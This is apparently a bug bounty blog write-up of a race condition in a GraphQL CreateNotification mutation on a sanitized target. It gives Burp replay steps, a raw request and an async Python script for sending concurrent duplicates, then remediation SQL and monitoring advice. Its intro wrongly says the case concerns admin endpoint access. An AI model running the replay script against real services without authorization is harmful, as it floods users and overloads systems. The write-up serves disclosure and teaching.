How I Abused a Race Condition to Create Duplicate Notification Records (sanitized)

Author: Satyam Pawale — hackersatty.com
Target (sanitized): vendor.hackersatty.com — Dashboard → Settings → Notifications → Add notification (modal)
Severity: High


About Me

Hey! I’m Satyam Pawale, known as @hackersatty in the bug bounty and ethical hacking world. I started bug hunting in 2024, and ever since, I’ve been obsessed with finding vulnerabilities that most people overlook.

My goal with this blog is to share real-world bug bounty experiences so other hunters can learn the techniques, tools, and mindset required to succeed — while staying ethical and responsible.

This case is about how I found critical admin endpoint vulnerabilities that allowed direct, unauthorized access to sensitive backend pages and data.

Summary

A race condition in the GraphQL CreateNotification flow allows many identical notification records to be created for the same (email, notificationType) pair by sending the same mutation concurrently. The backend performs a non-atomic existence check + insert (or lacks a uniqueness constraint), so parallel requests each succeed and create duplicate rows. Impact includes duplicate emails, queue exhaustion, corrupted metrics, and amplified downstream processing. Fix by enforcing atomic deduplication (DB unique constraint, upsert, or transactional locking) and canonicalizing inputs server-side.


Overview

While testing the notifications feature on a sanitized test instance, I discovered that sending the exact same CreateNotification GraphQL mutation near-simultaneously results in multiple identical notification records. The web UI may include client-side deduplication for UX, but the server accepts every concurrent request and persists a row per request because there is no server-side atomic deduplication or uniqueness enforcement.

All artifacts in this write-up are sanitized: domain names and identifiers use hackersatty.com and no real emails or tokens are included.


Vulnerability —

Race condition / missing server-side uniqueness: concurrent CreateNotification GraphQL mutations for the same canonical (email, notificationType) create duplicate database records.


Why this matters

  • Duplicate emails — recipients receive the same notification multiple times (spam, reputational risk).

  • Queue & worker load — duplicate rows trigger duplicate processing and waste resources.

  • Analytics pollution — duplicate rows inflate counts and break metrics.

  • Downstream amplification — exports, reporting, or workflows iterating over rows are multiplied.

  • Highly automatable — a script or proxy tool can reliably create many duplicates.


Best reproduction scenario

Preconditions

  • Valid test account on the portal.

  • Active session cookie or Authorization bearer token (the same session used by the UI).

  • Intercepting proxy or HTTP client that can replay requests concurrently (Burp Repeater, curl with xargs -P, Python aiohttp script, etc.).

  • Testing done only on authorized environments.

Steps

  1. Log into the portal at vendor.hackersatty.com with a test account.

  2. Dashboard → Settings → Notifications → Add notification (open the modal).

  3. Fill notification type (example: ACCOUNT_UPDATES) and a placeholder email (sanitized).

  4. Click Save once — confirm a single entry is created (expected).

  5. Start an intercepting proxy and perform the same Add action again to capture the GraphQL mutation for CreateNotification.

  6. Send the captured POST /graphql request to the proxy’s Repeater (or save the raw request).

  7. Clone the captured request many times (e.g., 5–20 identical copies).

  8. Use Send group (Parallel) in Burp Repeater (or run the copies concurrently via a script) so they hit the server within milliseconds of each other.

  9. Observe: each response returns success (HTTP 200 + GraphQL create payload).

  10. Refresh the Notifications UI — multiple identical notification rows appear for the same (email, notificationType) equal to the number of successful concurrent requests.


Sanitized PoC — Request (GraphQL mutation)

POST /graphql HTTP/2
Host: vendor.hackersatty.com
Content-Type: application/json
Apollographql-Client-Name: vendor-portal
Authorization: Bearer <REDACTED_TOKEN>
Origin: https://vendor.hackersatty.com
Referer: https://vendor.hackersatty.com/dashboard/settings/notifications

{
"operationName": "CreateNotification",
"variables": {
"input": {
"email": "<REDACTED_EMAIL>",
"notificationType": "ACCOUNT_UPDATES",
"accountId": 12345
}
},
"query": "mutation CreateNotification($input: CreateNotificationInput!) { createNotification(input: $input) { accountId notificationType email __typename } }"
}

Sanitized PoC — Typical Response (each concurrent request returns same success)

HTTP/2 200 OK
Content-Type: application/json

{
"data": {
"createNotification": {
"accountId": "12345",
"notificationType": "ACCOUNT_UPDATES",
"email": "<REDACTED_EMAIL>",
"__typename": "NotificationRecord"
}
}
}

Each parallel request returns a created payload and, after refresh, multiple identical notification rows exist in the UI.


Exactly how the race condition happens (technical explanation)

  1. Non-atomic check-then-insert: the server likely performs if not exists then insert.

  2. Concurrency window: when multiple identical requests arrive simultaneously, each executes the existence check before any concurrent inserts commit; each sees “no existing row” and proceeds to INSERT.

  3. No DB uniqueness constraint: the DB lacks a uniqueness constraint on (canonical_email, notification_type), so all inserts succeed.

  4. Outcome: the application returns “created” for each request; multiple identical records are persisted.

  5. Symptoms: N UI rows for N concurrent requests; duplicated processing downstream.

This is the classic race condition between check and insert under concurrency — the fix is to make creation atomic at the storage layer or to serialize the creation path.


Techniques & tools used (methodology)

  • Intercepting proxy: Burp Suite (Proxy + Repeater) with Send group (Parallel).

  • Alternative concurrency methods: curl with xargs -P, Python aiohttp or threaded requests, wrk/hey.

  • Verification: compare number of created rows in UI to number of concurrent requests; inspect GraphQL responses for created payloads.

  • Sanitization: remove tokens, emails, and PII from stored artifacts.

  • Optional automation: small async script that sends identical POSTs concurrently to reproduce in staging.

  • Race Condition

Concrete fixes (prioritized)

1) Enforce uniqueness at the database layer (recommended)

Create a unique index on canonicalized email + notification_type:

CREATE UNIQUE INDEX CONCURRENTLY idx_notifications_unique_email_type
ON notifications ((lower(email)), notification_type);

This guarantees the storage layer prevents duplicates under concurrent load.

2) Use atomic upsert (ON CONFLICT)

Preferred pattern:

INSERT INTO notifications (account_id, email, notification_type, created_at)
VALUES ($1, lower($2), $3, now())
ON CONFLICT ((lower(email)), notification_type) DO UPDATE
SET updated_at = EXCLUDED.created_at
RETURNING *;

Or ON CONFLICT DO NOTHING followed by SELECT the existing row if you need to return it.

3) Server-side canonicalization

Always canonicalize emails server-side (trim + lowercase + unicode normalize) before checks or inserts.

const canonicalEmail = email.trim().toLowerCase();

4) Optional: idempotency token

If clients can provide an idempotency key, enforce it server-side to dedupe create attempts. This is most suitable for API clients rather than basic UI clicks.

5) Transactional locking / advisory locks

If ON CONFLICT is not available, use transactional serialization or an advisory lock keyed by (account_id, canonical_email, notification_type) to serialize creation. This is less desirable than DB uniqueness + upsert.


Pseudocode — atomic upsert (preferred)

function createNotification(accountId, email, notificationType):
email = canonicalize(email) // trim + lowercase + normalize

result = db.query(
`INSERT INTO notifications (account_id, email, notification_type, created_at)
VALUES ($1, $2, $3, now())
ON CONFLICT ((lower(email)), notification_type) DO UPDATE
SET updated_at = now()
RETURNING *`,
[accountId, email, notificationType]
)

return result


Detection & monitoring recommendations

  • Alert on spikes in notifications creation per account or per email.

  • Instrument unique-violation metrics after adding constraints to detect attempted duplicates.

  • Audit logs: record create attempts, client IPs, and request ids for concurrent patterns.

  • Queue monitoring: track message queue length and worker backlogs triggered by notification rows.


Safe remediation rollout plan

  1. Immediate

    • Canonicalize emails server-side (lowercase + trim).

    • Add rate limits to the create endpoint.

  2. High priority

    • Clean existing duplicates (see dedupe plan below).

    • Create a unique index concurrently and change create flow to INSERT ... ON CONFLICT.

  3. Post-fix

    • Run dedupe migration in controlled batches and add monitoring.


Dedupe migration (safe approach)

  1. Backup the table.

  2. Identify duplicates:

SELECT lower(email) AS email_norm, notification_type, count(*) AS c
FROM notifications
GROUP BY lower(email), notification_type
HAVING count(*) > 1;
  1. Keep one canonical row (e.g., earliest created_at) and delete others in batches:

WITH ranked AS (
SELECT id, ROW_NUMBER() OVER (
PARTITION BY lower(email), notification_type
ORDER BY created_at ASC
) rn
FROM notifications
)
DELETE FROM notifications
WHERE id IN (SELECT id FROM ranked WHERE rn > 1)
LIMIT 1000; -- run repeatedly until done
  1. Validate referential integrity and update dependent tables if necessary. Run in small batches with an audit trail.


Example automated reproduction script (sanitized, Python async)

For authorized testing only — do not run against production without permission.

# async_replay.py (sanitized)
import asyncio
import aiohttp

URL = "https://vendor.hackersatty.com/graphql"
HEADERS = {
"Content-Type": "application/json",
"Authorization": "Bearer <REDACTED_TOKEN>"
}
PAYLOAD = {
"operationName": "CreateNotification",
"variables": {
"input": {
"email": "<REDACTED_EMAIL>",
"notificationType": "ACCOUNT_UPDATES",
"accountId": 12345
}
},
"query": "mutation CreateNotification($input: CreateNotificationInput!) { createNotification(input: $input) { accountId notificationType email } }"
}

async def send_one(session):
async with session.post(URL, json=PAYLOAD, headers=HEADERS) as resp:
text = await resp.text()
return resp.status, text

async def main(n):
async with aiohttp.ClientSession() as session:
tasks = [send_one(session) for _ in range(n)]
return await asyncio.gather(*tasks)

if __name__ == "__main__":
results = asyncio.run(main(10))
for status, body in results:
print(status, body[:200])

This script sends 10 concurrent create requests; on an affected system you would see multiple created rows.


Short checklist to verify the fix in staging

  1. Add canonicalization and upsert logic + unique index in a branch.

  2. Run the staging app and attempt the same parallel test (Burp Repeater Send group or the async script).

  3. Confirm only one notification row exists per canonical (email, notificationType) after the concurrent attempts.

  4. Monitor logs and unique-violation metrics; expect zero unhandled constraint errors in normal flow.

  5. Run the dedupe migration if historical duplicates exist and then create the index.


Summary —

  1. Enforce uniqueness at the DB layer: create a unique index on canonicalized (lower(email), notification_type).

  2. Make creation atomic: use INSERT ... ON CONFLICT (upsert) or equivalent so concurrent creates cannot produce duplicates.

  3. Canonicalize inputs server-side: trim and lowercase emails and return the existing resource or a clear response when duplicates are attempted.

Final Thoughts

This case is a perfect reminder that even mature applications can overlook concurrency edge cases that don’t show up in regular testing. Client-side validation or simple “check-before-insert” logic might appear sufficient, but when operations run in parallel, the tiniest race window can lead to large-scale data integrity issues.

What made this bug particularly impactful is that it didn’t rely on exotic conditions or privilege escalation — just timing. By coordinating concurrent identical requests, an attacker could manipulate backend logic in ways that normal single-threaded testing would never reveal.

In real-world systems where notifications, transactions, or queue-based processes are triggered by new records, such duplication can have serious downstream effects — from flooding users with redundant messages to distorting analytics or overloading task queues.

Building truly robust APIs requires more than input validation; it demands atomic operations, proper database constraints, and a mindset that anticipates concurrency. Race conditions often hide in plain sight, but once discovered, they offer some of the most valuable lessons for improving backend resilience.

In short, always think in parallel — because your attackers certainly will.

Get the Latest Cybersecurity & Bug Bounty Drops

Get real-world vulnerability writeups, bug bounty techniques, and exclusive hacker tools – straight to your inbox.

We don’t spam! Read our privacy policy for more info.

Leave a Reply

© 2025 Hacker Satty - Ethical Hacking & Bug Bounty | Contact Us